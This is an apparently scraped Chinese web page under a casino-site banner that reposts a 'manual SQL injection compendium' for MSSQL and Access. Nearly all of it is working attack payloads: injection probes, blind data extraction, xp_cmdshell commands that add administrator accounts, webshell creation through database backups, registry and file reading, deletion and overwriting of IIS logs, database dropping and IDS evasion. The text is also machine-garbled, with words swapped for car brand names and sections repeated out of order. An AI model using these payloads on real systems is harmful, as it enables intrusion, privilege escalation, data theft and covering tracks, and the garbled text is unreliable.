澳门新浦京娱乐场网站-www.146.net-新浦京娱乐场官网
做最好的网站

SQL手工注入,SQL手工注入大全

转自脚本之家:

sql手工业注入语句&SQL手工业注入大全(转),sql注入语句

转自脚本之家:

看看下边包车型地铁
1.肯定是还是不是有注入
;and 1=1
;and 1=2

2.初阶判别是还是不是是mssql
;and user>0

3.剖断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.流入参数是字符
'and [查询条件] and ''='

5.寻找时没过滤参数的
'and [查询条件] and '%'='

6.猜数据库
;and (select Count(*) from [SQL手工注入,SQL手工注入大全。数据库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

11.增添mssql和体系的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当前有所驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得全部子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

13.mssql中的存款和储蓄进程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多少个记录集情势赶回全体键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' 重临制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 代表字符型,REG_DWO讴歌ZDXD 代表整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName' 删除某些值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包含该键下全部值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:l.asp';

15.mssql内置函数
;and (select @@version)>0 得到Windows的版本号
;and user_name()='dbo' 判定当前系统的连天顾客是还是不是sa
;and (select user_name())>0 爆当前系统的总是客户
;and (select db_name())>0 获得当前连日的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';

伸手的时候,像那样子用:

SQL手工业注入大全

前提供给工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩张进程的办法是运用如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell扩张进度的诀要是使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

SQL手工注入方法总括(SQL Server2006)2008-01-28 16:17---------以下以轻巧注入点用UTucsonL代替

--(1) ******查阅驱动器方法******

-- 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,别的省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出装有驱动器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驱动器总的数量

UEvoqueL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

--上边经常用于无显错情状下行使-------由此及彼,得到全部驱动器名

UKugaL;and (select a from p where i=1)>3;--报错得到第三个驱动器名

--上边平常用于显错情形下行使-------由此及彼,得到全部驱动器名

URL;;drop table p;--删除表p

--(2) ******查看目录方法******

UCRUISERL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

UMuranoL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错拿到深度i=1的率先个目录名

--下边日常用显错且目录名不为数字情况下使用-------(获得第三个目录把"top 0"换为"top 1",换深度只换i就行)就那样推算,获得e盘的全体目录

U奔驰M级L;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长短

U科雷傲L;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第二个目录名的首先个字符长度

--下边日常用无显错处境下选择-------(获得第叁个目录把"top 0"换为"top 1",换深度只换i就行)就那样类推,获得e盘的有着目录

URL;drop

手工业MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判别是还是不是是MSSQL
and exists(select * from tableName) //推断某表是不是存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //当地服务名
and 1=(select IS_S宝马X5VROLEMEMBE迈凯伦570(‘sysadmin’)) //推断是不是是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //判定是或不是是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //判定是或不是有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3….
;declare @d int //是或不是支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判断XP_CMDSHELL是或不是留存
and 1=(select count(*) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread扩张存款和储蓄进程是或不是现已被删去
丰富和删除多少个SA权限的客户test:(需求SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活有个别服务。 (须要SA权限)
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
暴网址目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
判别是不是可打针:


and 1=1
and 1=2
and 1=1
and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
显明数据库类型:
and user>0
and (select count(*) from sysobjects)>0
询问当前客商数据音信:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴任性表和列:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
扩张数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
获得当前数据库顾客名:and user>0
赢稳妥前数据库名:and db_name()>0
取得数据库版本:and (select @@version)>0
推断是还是不是扶助多句询问:;declare @a int–
看清是还是不是帮助子查询:and (select count(1) from [sysobjects])>=0
数据库的恢弘存款和储蓄进度:exec master..xp_cmdshell
查阅服务器C盘目录:;exec_master..xp_cmdshell ‘dir c:’
认清扩大存款和储蓄进程是不是留存:and select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
还原扩大存款和储蓄进程:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
去除扩充存储进度:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL贰仟中提供了部分函数用于访谈OLE对象间接获取权力:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:’
剖断当前数据库客户名是不是具备相比高的权柄:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
剖断当前数据库客户名是还是不是为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSE锐界VEPRADO的master.dbo.sysdatabases表中贮存着SQLSE传祺VERubicon数据库系统中的全部数据库音信,只须求PUBLIC权限就能够对此表张开SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
删除日志记录:
;exec master.dbo.xp_cmdshell ‘del c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
轮换日志记录:
;exec master.dbo.xp_cmdshell ‘copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
获取WEB路径:
;declare @shell int
;exec master..sp_oamethod ‘wscript.shell’,@shell out
;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master..xp_cmdshell ‘dir /s d:/index.asp’
突显服务器网址配置新闻命令:
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘systemcurrentcontrolsetservicesw3svcparametersvirtual roots’
‘/’
SQLSERVE奥迪Q3下的高端级技艺可以参照他事他说加以考察阅读曾云好所著的贯通脚本红客第五章。
3、DSqlHelper
检查测验权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_cmdshell’)
检测XP_REGREAD(注册表读取功能):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_regread’)
检测SP_MAKEWEBTASK(备份效用):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_addextendedproc’)
检测XP_SUBDI途观S读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master..xp_cmdshell ‘dir c:’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL增多客商红客:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
创建表test:
;create table [dbo].[test] ([dstr][char](255));
检查实验表段test:
and exists (select * from test)
读取WEB的职责(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
纸包不住火WEB的相对路线(显错情势):
and 1=(select count(*) from test where dstr > 1)
删除表test:
;drop table test;–
创立查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的剧情参加表dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:’
爆目录的内容dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk=’c:inetpubwwwrootdown.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
把驱动盘列表出席temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
赢得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:’;–
揭破内容(显错情势):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master..xp_cmdshell ‘dir c:’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(实践命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c net user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c md c:inetpubwwwroot1111’
创制一个设想目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:”‘
设置设想目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e browse’
启动SERVER服务:
;exec master..xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ‘dir c:’
翻开远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
展开远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’

早就上马冒汗了.

初稿地址:

转自脚本之家: 看看上边包车型客车 1.判别是还是不是有注入 ;and 1=1 ;and 1=2 2.初叶剖断是不是是mssql ;and us...

1.剖断是或不是有注入
;and 1=1
;and 1=2

and exists (select * from sysobjects) //判别是还是不是是MSSQL

比如说在查询id是50的多少时,假使客户传前段时间的参数是50 and 1=1,若无安装过滤的话,能够直接查出来,SQL 注入日常在ASP程序中相遇最多,

拜谒下边包车型大巴
1.决断是不是有注入
;and 1=1
;and 1=2

2.初始剖断是还是不是是mssql
;and user>0

and exists(select * from tableName) //推断某表是或不是存在..tableName为表名

探问上面包车型客车
1.决断是不是有注入
;and 1=1
;and 1=2

2.开头剖断是或不是是mssql
;and user>0

3.判别数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

and 1=(select @@VERSION) //MSSQL版本

2.伊始剖断是还是不是是mssql
;and user>0

3.确定数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.注入参数是字符
'and [询问条件] and ''='

And 1=(select db_name()) //当前数据库名

3.确定数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.流入参数是字符
'and [查询条件] and ''='

5.找寻时没过滤参数的
'and [查询条件] and '%'='

and 1=(select @@servername) //本地服务名

4.流入参数是字符
'and [询问条件] and ''='

5.搜索时没过滤参数的
'and [询问条件] and '%'='

6.猜数据库
;and (select Count(*) from [数量库名])>0

and 1=(select IS_SCR-VVROLEMEMBETiguan('sysadmin')) //判定是或不是是系统管理员

5.寻找时没过滤参数的
'and [询问条件] and '%'='

6.猜数据库
;and (select Count(*) from [数量库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

and 1=(Select IS_MEMBER('db_owner')) //判定是或不是是库权限

6.猜数据库
;and (select Count(*) from [数量库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中著录长度
;and (select top 1 len(字段名) from 数据库名)>0

and 1= (Select HAS_DBACCESS('master')) //判别是还是不是有库读取权限

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....

8.猜字段中著录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

SQL手工注入,SQL手工注入大全。;declare @d int //是不是援救多行

9.(1)猜字段的ascii值(access)
; and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是还是不是存在

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

11.增添mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩张存款和储蓄进程是否现已被剔除

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS _SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--< br />;and 1=(select IS_MEMBER('db_owner'));--

11.增多mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步获得的paths'))>)

累加和删除二个SA权限的客商test:(供给SA权限)

11.增添mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步获得的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前具有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得全部子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的剧情

exec master.dbo.sp_addlogin test,password

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步获得的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前持有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得全数子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

13.mssql中的存款和储蓄进度
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多少个记录集方式赶回全体键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' 重回制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWO纳瓦拉D 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName' 删除有些值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包含该键下全数值

exec master.dbo.sp_addsrvrolemember test,sysadmin

(2)遍历目录
;create table te mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前具备驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
;insert into temp(id,num1) exec m aster.dbo.xp_dirtree 'c:';-- 获得全数子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的剧情

13.mssql中的存款和储蓄进度
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集情势赶回全部键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' 再次来到制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWO奔驰G级D 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName' 删除有些值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包含该键下全体值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:l.asp';

停掉或激活某些服务。 (须要SA权限)

13.mssql中的存储进程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicr osoftWindowsCurrentVersionRun' 以八个记录集方式赶回全体键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' 重返拟订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersio n','TestvalueName' 删除有个别值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,富含该键下全体值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:l.asp';

15.mssql内置函数
;and (select @@version)>0 得到Windows的本子号
;and user_name()='dbo' 剖断当前系统的连天顾客是不是sa
;and (select user_name())>0 爆当前系统的总是客户
;and (select db_name())>0 得到当前连续的数据库

exec master..xp_servicecontrol 'stop','schedule'

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('') ;
backup database model to disk='c:l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的本子号
;and user_name()='dbo' 剖断当前系统的连天客户是或不是sa
;and (select user_name())>0 爆当前系统的总是顾客
;and (select db_name())>0 得到当前连年的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';

exec master..xp_servicecontrol 'start','schedule'

15.mssql内置函数
;and (select @@version)>0 获得Windows的本子号
;and user_name()='dbo' 判别当前系统的连天客户是还是不是sa
;and (select user_name())>0 爆当前系统的总是顾客
;and (select db_name())>0 获得当前延续的数 据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';

呼吁的时候,像那样子用:

暴网站目录

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';

呼吁的时候,像这标准用:

SQL手工业注入大全

create table labeng(lala nvarchar(255), id int)

呼吁的时候,像那样子用:

SQL手工业注入大全

前提需求工具:SQL Query Analyzer和SqlExec Sunx Version

DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots','/',@result output insert into labeng(lala) values(@result);

SQL手工业注入大全

前提必要工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩大进度的形式是运用如下语句:

and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

前提供给工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩展进程的章程是采纳如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

—————————————————————————————————————————————————————

1.去掉xp_cmdshell扩张进度的不二诀要是采用如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell增加进度的法子是接纳如下语句:

